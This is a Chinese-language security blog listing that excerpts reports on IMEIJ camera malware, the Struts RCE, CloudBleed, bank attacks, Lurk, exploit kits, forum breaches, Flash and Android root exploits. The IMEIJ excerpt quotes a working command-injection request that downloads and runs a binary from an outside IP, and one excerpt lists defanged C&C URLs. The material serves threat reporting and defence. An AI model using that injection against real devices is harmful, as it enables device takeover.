攻擊 CGI 漏洞的新 Linux 惡意程式

 

長久以來,Linux 一直是企業平台與物聯網(IoT ,Internet of Thing)裝置製造商所偏愛的作業系統。許多不同產業都紛紛採用以 Linux 為基礎的裝置來建置智慧型系統,並利用物聯網 (IoT) 閘道來建立各種業務所需的連網解決方案及服務。然而隨著這類裝置不斷普及,針對 Linux 系統的資安威脅也跟著增加。先前在 2016 年我們即討論過一系列的 Linux 威脅,其中最知名的莫過於 Mirai 惡意程式 (趨勢科技命名為 ELF_MIRAI)。

最近又出現了一個新的 Linux ARM 惡意程式叫做 IMEIJ (趨勢科技命名為 ELF_IMEIJ.A)。此威脅專門攻擊 AVTech (陞泰科技) 監視攝影裝置的漏洞。此漏洞是由匈牙利的資安研究機構 Search-Lab 所發現,並且在 2016 年 10 月公開揭露。不過在此之前,Search-Lab 曾多次試圖聯絡 AVTech 卻未獲回應。

感染流程及類似惡意程式

此惡意程式是經由 CGI 指令感染。遠端駭客會隨機挑選一個 IP 位址然後向該位址發送以下網站指令來攻擊此漏洞:

POST /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget -O /tmp/Arm1 http://192.154.108.2:8080/Arm1;chmod 0777 /tmp/Arm1;/tmp/Arm1; HTTP/1.1

更精確一點,它是利用 AVTech 裝置上的 CloudSetup.cgi 程式漏洞將惡意程式下載到裝置上,前述網站指令會讓裝置下載惡意檔案,並且將檔案設定成可執行檔。

圖 1:IMEIJ 的感染流程。 Continue reading “攻擊 CGI 漏洞的新 Linux 惡意程式"

CVE-2017-5638:Apache Struts 2 漏洞可能讓駭客從遠端執行程式

 

Apache Struts 是一個免費的開放原始碼程式開發架構,用來開發 Java 網站應用程式。我們仔細研究了過去 Apache Struts 被發現的幾個遠端程式碼執行 (Remote Code Execution,簡稱 RCE) 漏洞之後發現,歹徒大多使用 Object Graph Navigation Language (OGNL) 這個程式語言。OGNL 之所以很容易讓駭客從遠端執行任意的程式碼,是因為 Apache Struts 在大多數的流程當中都用到這個語言。

最近,一位研究人員在 Apache Struts 2 當中新發現一個關於 OGNL 的遠端程式碼執行漏洞:CVE-2017-5638。此外,一份報告也指出網路上已出現實際的漏洞攻擊案例,我們的研究和監控團隊也見過利用該漏洞的攻擊。

攻擊手法

駭客可以發送一個精心設計的網站請求給含有漏洞的伺服器,就能將一個檔案上傳至使用 Jakarta 外掛模組來處理檔案上傳請求的伺服器。

駭客接著在 Content-Type 標頭當中包含所要執行的指令來讓受害的伺服器執行指令。網路上已經出現示範這項攻擊手法的概念驗證

漏洞分析

為了深入了解這項漏洞,我們仔細研究了一下該漏洞的修補程式,我們發現廠商在 FileUploadInterceptor.java 當中已放棄使用「LocalizedTextUtil」這個類別。此類別原本是用來在 HTTP 檔案上傳請求失敗時提供錯誤訊息給使用者。 Continue reading “CVE-2017-5638:Apache Struts 2 漏洞可能讓駭客從遠端執行程式"

CloudFlare漏洞造成潛在的大規模資料外洩

全球最大型網路服務公司的程式碼出現嚴重缺陷,導致敏感資料會被外洩到網路上。在部落格的事後檢討文章中,CloudFlare詳細說明了其邊際伺服器如何受到緩衝區溢出的影響,導致對使用CloudFlare服務的網站所發出的請求會返回隨機資料位元,這可能包含了私密資訊如API金鑰、使用者憑證、cookies甚至是私人訊息。外洩資料也被搜尋引擎所暫存,增加了被用在惡意用途的可能性。這個漏洞已經被非正式地稱為「CloudBleed」,因為它跟早期的HeartBleed漏洞有相似之處。

「CloudBleed」一開始是由Google研究人員Travis Omandy所發現,他在觀察到對使用CloudFlare服務的網站所發出HTTP請求的異常行為時回報了此一問題。經過分析,CloudFlare將問題追查至其新的cf-html HTML解析程式。具體地說,這個問題跟存在其舊Ragel解析程式內多年的程式碼錯誤有關,不過問題會浮現是因為切換到新解析程式改變了緩衝機制,導致資料外洩的發生。

CloudFlare的即時回應是停用使用有資料外洩問題HTML解析程式的相關功能。此外,也組成了一個團隊來找出和修復解析程式內的錯誤,他們會設法在短時間內完成任務,在資料被更廣泛擴散前將潛在的傷害最小化。

 

網路使用者應該擔心嗎?

考量到使用CloudFlare服務的網站數量和資料可能遭到外洩的有效時間長度(最早可能從2016年9月),這似乎是件應該擔心的事情,特別是對經常使用CloudFlare相關網站的使用者來說。不過該公司也說明了資料外洩所造成的影響並沒有那麼大。據估計,在2月13日至18日期間所造成的資料外洩影響最大,透過CloudFlare所進行的3,300,300個HTTP請求中有約1個(0.00003%)可能會導致記憶體資料外洩。

這一點再加上CloudFlare對此事件的快速回應,顯示出資料外洩的影響應該很小。不過這起事件還是提醒了所有網路使用者必須要做好準備來保護自己最重要的數位資產 – 特別是包含敏感資料的部分。

因為主要問題並非使用者所能夠控制,所以使用者能做的最佳行動是變更使用CloudFlare基礎設施網站上的密碼。除了變更密碼,這或許也是個好時機讓使用者去採用更有效的驗證方法,如雙因子身份認證

 

@原文出處:CloudFlare Flaw Causes Potential Major Data Leak

波蘭銀行和其他金融機構遭受新惡意軟體攻擊

2017年 2月,許多的波蘭銀行回報在系統上出現未曾偵測到的惡意軟體變種。受影響的銀行報告了異常行為,包括連到國外的網路流量、加密的可執行檔和使用者工作站上的惡意軟體。惡意軟體分析顯示一旦其下載到工作站後,它會連到外部伺服器並且進行網路探勘、橫向移動和資料流出。

 

該惡意軟體被懷疑是放在波蘭金融監管局(該國的金融監管機構)網站上。有意思的是,研究人員還發現有證據顯示攻擊所用的程式碼跟墨西哥全國銀行及證券監察委員會及烏拉圭銀行所發生攻擊事件內的程式碼相似

有跡象顯示針對波蘭銀行的攻擊屬於更大規模全球性攻擊活動的一部分,這波攻擊活動針對31個國家的104個金融組織。攻擊者入侵了目標組織的網站,注入惡意程式碼來將訪客重新導向會安裝惡意軟體的漏洞攻擊套件。漏洞攻擊套件是種用來感染訪客的客製化工具,特別是使用目標金融機構所擁有IP地址的使用者。 Continue reading “波蘭銀行和其他金融機構遭受新惡意軟體攻擊"

洗劫金融機構超過4500萬美元,第一批運用無檔案感染技術的網路犯罪集團:Lurk

無檔案感染技術已經被用來將目標電腦加入「Botnet傀儡殭屍網路」、派送勒索病毒、感染銷售端點(PoS)系統及進行點擊詐騙(click fraud)。

Lurk第一批運用無檔案感染技術的網路犯罪集團,如何從一群威脅分子轉變成完整的網路犯罪組織?

為何Lurk 總選擇在午休時間進行惡意內容派送?

沒有單一網路防禦工具可以處理這些威脅,IT 如何因應?

Lurk 興風作浪的這五年

 

無檔案感染(Fileless Infection)就如同其名:沒有下載或寫入惡意檔案到磁碟就感染了系統。無檔案感染並非新技術或罕見,而且對企業和一般使用者都造成了嚴重的威脅,因為它能夠取得權限並且一直待在攻擊者的目標系統內而不被發現。但是無檔案感染技術已經被用來將目標電腦加入「Botnet傀儡殭屍網路」派送勒索病毒感染銷售端點(PoS)系統及進行點擊詐騙(click fraud)。無檔案感染對攻擊者來說,重要的一點是可以先評估中毒系統,確認感染狀態再決定是否繼續或消失無蹤。

典型的Lurk攻擊會利用瀏覽器漏洞將非持久性病毒派送給目標受害者

Lurk屬於第一批在大規模攻擊中有效地運用無檔案感染技術的網路犯罪集團,這些技術之後也成為其他犯罪分子的重要手段。典型的Lurk攻擊會利用瀏覽器漏洞將非持久性病毒派送給目標受害者,在部署其他惡意軟體前先探測其目標。感染鏈有多個階段,可以利用在記憶體內執行的無檔案病毒來進行而無須另外的持久性機制。如果Lurk集團對目標系統不感興趣,則在感染系統內除了來自漏洞攻擊程序的檔案外不會留下其他痕跡。這種隱匿行為讓其惡名昭彰,直到幕後黑手被逮捕而停止了行動。俄羅斯內政部在2月8日逮捕了9名以上的嫌犯。Lurk集團從金融機構獲取超過4500萬美元,同時也破壞了受害者的營運、信譽和重要的一切。

Lurk是如何從一群威脅分子轉變成完整的網路犯罪組織?他們還知道什麼其他的技術可能被其他網路犯罪分子仿效?他們的運作模式如何從針對俄羅斯一般使用者轉成銀行和企業?我們對該組織的觀察是基於對其程式碼、網路流量和網址特徵的分析,我們在俄羅斯數個組織的入侵偵測系統在Lurk集團活動的五年間進行監視。

2011年至2012年初:利用路過式下載「Drive by download」攻擊瀏覽器漏洞進而危害系統

Lurk的網頁攻擊是他們攻擊活動的首要跡象。他們實作了某些機制來防止防毒偵測。比方說,特定時間區段或非其目標區域IP來的網頁連線請求會被重新導到第三方網站(如Google)。 Continue reading “洗劫金融機構超過4500萬美元,第一批運用無檔案感染技術的網路犯罪集團:Lurk"

企業平均約需要 30 天完成修補程式測試,「漏洞攻擊套件 + 勒索病毒」,考驗和時間賽跑的 IT 管理員

  • 至少有 18% 的已知勒索病毒 Ransomware (勒索軟體/綁架病毒)家族現在都經由漏洞攻擊套件散布
  • 光是 2016 年第一季,勒索病毒就從企業身上海撈了將近2.09 億美元的不法所得

不論任何時刻,網路總是會存在著漏洞,尤其若網路上還有一些老舊的系統或軟體,再加上零時差漏洞,那麼系統管理員根本就永遠在和時間賽跑。IT 系統管理員甚至必須想辦法在漏洞攻擊套件已收錄的零時差漏洞修補之前防範網路遭受攻擊。他們必須面對各種挑戰,例如,他們不僅要維護關鍵系統的營運不間斷,還要保護網路邊境。就算拿到了漏洞修補程式,也要先完成測試才能開始部署。企業平均約需要 30 天的時間來完成修補程式測試。這樣的情況再加上其他因素,就會導致空窗期,讓漏洞攻擊套件有機可乘。

 ————————————————-

漏洞攻擊服務(Exploits as a Service):「漏洞攻擊套件 + 勒索病毒」如何影響企業生計?

2013 年,Blackhole 漏洞攻擊套件和 搜尋CryptoLocker 開創了漏洞攻擊套件與勒索病毒聯手出擊的先例。沒過多久,其他漏洞攻擊套件,如:Angler、Neutrino、Magnitude 和 Rig 也隨之跟進。至少有 18% 的已知勒索病毒 Ransomware (勒索軟體/綁架病毒)家族現在都經由漏洞攻擊套件散布。

值得一提的是,漏洞攻擊套件最早從 2006年起便一直是各種威脅的散布管道。2010 年至今,趨勢科技至少已發現 100 個漏洞被收錄到幾十個套件當中。勒索病毒僅是漏洞攻擊套件可能植入系統當中的眾多威脅類型之一。

[延伸閱讀:進一步認識漏洞攻擊套件]

光是 2016 年第一季,勒索病毒就從企業身上海撈了將近2.09 億美元的不法所得。雖然勒索病毒的直接風險就是資料損失,但它還會帶來其他的不良後果,包括:品牌和商譽損失、法律賠償以及復原關鍵資料的額外成本。

[延伸閱讀:勒索病毒當道的時代 ]

漏洞攻擊套件為何會成為各種威脅的有效的散布管道?首先,這類攻擊無需假借使用者之手,因為它們利用的是熱門軟體未修補的漏洞。光是今年上半年,趨勢科技 (加上 TippingPoint) 和 ZDI 漏洞懸賞計劃就發現了 473 個漏洞。 Continue reading “企業平均約需要 30 天完成修補程式測試,「漏洞攻擊套件 + 勒索病毒」,考驗和時間賽跑的 IT 管理員"

從論壇受駭事件,看熱門網路平台的漏洞攻擊

最近的遭受駭客攻擊的Ubuntu列王的紛爭(Clash of Kings)、戰甲神兵(Warframe),還有最新一起的迪士尼Playdom都具備了兩個共通點,都是使用vBulletin(一個為線上社群設計的網路論壇軟體),它們還有一個共通的特點:都被駭了。雖然這些事件並沒有關聯,報告指出每起攻擊背後的駭客都可以取得類似的詳細資料 – 用戶名稱、電子郵件地址、IP地址和兩款熱門遊戲的Facebook個人檔案資料。

論壇軟體:一個被低估的危險性

最近的這些論壇受駭事件顯示熱門網路平台仍然可能遭受基礎的漏洞攻擊。不幸的是,儘管多數網路平台的外觀感覺都已經大幅改變,要管理論壇軟體仍然是個艱鉅的挑戰,因為這些平台都是公開使用,意味著大多數的資料庫仍然容易受到特定類型的攻擊。

論壇軟體一向都很難加以防護。它們需要處理大量傳入的使用者輸入,如搜尋和貼文,需要SQL資料庫來儲存所有之前的文章,通常都是由小型開發團隊所為戶,所以疏漏有時是難以避免。升級論壇軟體通常是件不簡單的任務,而且更新程式需要時間才會發布,這可能是為什麼大多數管理員不會立刻更新。

在列王的紛爭(Clash of Kings)被駭事件中(可能還有其他也是),駭客攻擊了一個未更新修補程式的漏洞,據說是因為列王的紛爭論壇使用的是2013年的舊版本vBulletin,而且沒有使用任何加密。在Ubuntu和戰甲神兵(Warframe)被駭事件中,攻擊者利用了SQL注入漏洞,這也是駭客們最喜歡的工具之一。輕微的疏忽,如使用舊版或過時的軟體,或是沒有更新修補程式都會讓危險放大。

在2016年6月,駭客從超過一千個熱門論壇竊取了數萬名帳號,這些論壇都是架設在VerticalScope,一家多倫多媒體公司。根據入侵外洩通知網站LeakedSource,資料外洩的範圍可能已經大於原先的預期。再一次,連串駭客事件顯示受駭網站沒有達到今日安全環境的要求:更強的加密和持續更新修補程式以解決已知的安全漏洞。

 

被竊的資料怎麼了?

使用者的認證資料,如使用者名稱和密碼是攻擊者的共同目標,並且能為進一步的攻擊和詐騙提供相當長期的價值。網路犯罪分子會利用資料的金融價值,貨幣化他們所竊取的資料 – 多寡取決於資料的類型。例如,在巴西地下市場,市內電話號碼清單可以賣到317美元到1,931美元之間,而一組電子郵件登入憑證可以在中國黑市賣較便宜的價格 – 163美元。工作和個人電子郵件地址可以在俄羅斯地下市場賣到高達200美元。

[延伸閱讀:竊個人資料的全球黑市]

Continue reading “從論壇受駭事件,看熱門網路平台的漏洞攻擊"

Google 新一版的Chrome 將封殺Flash

在即將到來的九月中,Chrome版本53會開始有效地封鎖Flash。根據Google的Chrome部落格,Google計劃在今年年底在新版Chrome瀏覽器將Adobe Flash Player擋在門外。Google表示他們計劃在12月發表Chrome版本55,用HTML5取代Flash,這是個輕量而無須外掛程式的Adobe多媒體軟體平台的替代方案。此舉可以提高安全性,並且降低電力消耗和網頁載入時間。

在2015年,Google推出「智慧化暫停(intelligent pausing)」 ,Chrome的點擊後載入功能,可自動停止內容播放(包括了Flash動畫)以節省資料傳輸和電力。內容通常是廣告或網站側邊欄的自動播放影片,這些會拖慢網頁載入且被認為較無關緊要。自動暫停功能大大提升網頁瀏覽速度和顯著地降低電力消耗。但還是一種選擇性的作法,因為被暫停的內容可以用滑鼠點擊恢復。有了這功能,Google表示,「你會注意到的唯一變化是更加安全,更節省電力的瀏覽體驗。」

隨著Flash的普及,它在十幾年來也長期飽受批評。Apple公司在其行動設備不支援Flash就開始了它的下滑之路,而未曾中止的安全問題和大量耗用設備資源也促使網站將圖像和動畫從Flash轉成HTML5

 

[延伸閱讀:Adobe Flash的難題:積重難返]

Flash已經出現過許多安全問題,雖然這也有可能是來自於它受歡迎的程度和普及性。由於支援該平台是熱門瀏覽器功能的一部分,從微軟的IE到Mozilla的Firefox和Google的Chrome,它已經成為普遍的漏洞攻擊目標,反復地將使用者暴露在威脅前。在2015年有許多Flash漏洞(包括兩個零時差漏洞)在一年的前幾個星期就被發現。趨勢科技在一月底回報了第一個,其會影響微軟Windows的Adobe Flash Player使用者。在二月初,另一個Flash的零時差漏洞被發現,這次是用在惡意廣告Continue reading “Google 新一版的Chrome 將封殺Flash"

Hacking Team 資料外洩曝光的漏洞攻擊,仍影響 Android 用戶

專門提供駭客服務的Hacking Team自己也被駭了! 這是 2015 年備受矚目的資安事件。雖然,Hacking Team 資料外洩事件已經是好幾個月前的事了,但因漏洞攻擊程式碼的曝光而引發一連串的攻擊,至今仍持續影響著我們。

最近,趨勢科技發現了一批 Android 惡意程式很顯然是採用了 Hacking Team 事件當中的某項漏洞攻擊程式碼。這批在網路上發現的惡意應用程式一旦得逞,就能讓遠端駭客取得感染裝置的系統管理員 (root) 權限,所有 Android 4.4 (KitKat) 以及更早版本的行動裝置 (占了將近所有 Android 裝置的 57%)都受到此漏洞的影響。

Android 病毒

 

攻擊細節

根據趨勢科技的分析,這批惡意應用程式含有一段稱為「reed」 的漏洞攻擊程式碼,也就是 Hacking Team 的 kernel_waiter_exploit 漏洞攻擊程式碼,這段程式可藉由 TowelRoot 漏洞 (CVE-2014-3153) 在裝置上植入一個後門程式,TowelRoot 是 Linux 系統在 2014 年就已修補的一個舊漏洞。

有了這個後門程式,駭客就能到幕後操縱 (C&C) 伺服器 (hxxps://remote.ibtubt.com/phone/ )下載最新的惡意程式到裝置上,並以系統管理員權限執行程式。

圖 1:Hacking Team 事件所外洩的漏洞攻擊程式碼。

駭客將這段漏洞攻擊程式碼暗藏在多款遊戲和 Launcher (啟動器) 應用程式當中,並透過下列網站散布:hxxp://risechen.b0.upaiyun.com,例如:Maria’s Coffie Shop、酷酷斗地主、iLauncher、One Launcher 以及 Launcher IP Style 6s 等等。我們發現至少有 88 個應用程式含有這段漏洞攻擊程式碼,但目前我們尚未見到其任何一個惡意程式在第三方應用程式商店上架。

圖 2:含有漏洞攻擊程式碼的惡意遊戲範例。 Continue reading “Hacking Team 資料外洩曝光的漏洞攻擊,仍影響 Android 用戶"

ImageMagick 軟體出現漏洞,使用者可能上傳「中毒」的自拍照

根據一篇報導,知名的影像處理軟體 ImageMagick 被發現有個可能讓網站暴露於攻擊風險的漏洞。這項資安漏洞可能讓受感染的影像騙過網站伺服器而執行可蒐集資料或窺探使用者帳號的惡意程式碼。此漏洞將影響那些使用 ImageMagick 軟體以及那些允許使用者上傳影像的網站服務。

ImageMagick 是一專門來建立、編輯、合成及轉換影像的套裝軟體,一些社群媒體平台、部落格網站以及內容管理系統,都使用這套軟體來縮放或調整使用者上傳的影像。

ImageMagick 在一份聲明當中回應了這項報導:「我們最近接獲一些程式設計師通報的漏洞,這些漏洞可能讓駭客從遠端執行程式碼,或者在本地端電腦上產生檔案。

此漏洞是由資安研究人員 Stewie 以及資安工程師 Nikolay Ermishkin 所共同發現。根據資安專家表示,雖然這項安全漏洞目前並無進一步的資訊,不過卻令人擔憂,因為在沒有修補程式可以降低損害的狀況下,該漏洞的細節已經廣為流傳。由於漏洞資訊已經曝光,資安專家也必須開始跟駭客展開賽跑,才能保障全球伺服器的安全,避免遭到駭客入侵。 Continue reading “ImageMagick 軟體出現漏洞,使用者可能上傳「中毒」的自拍照"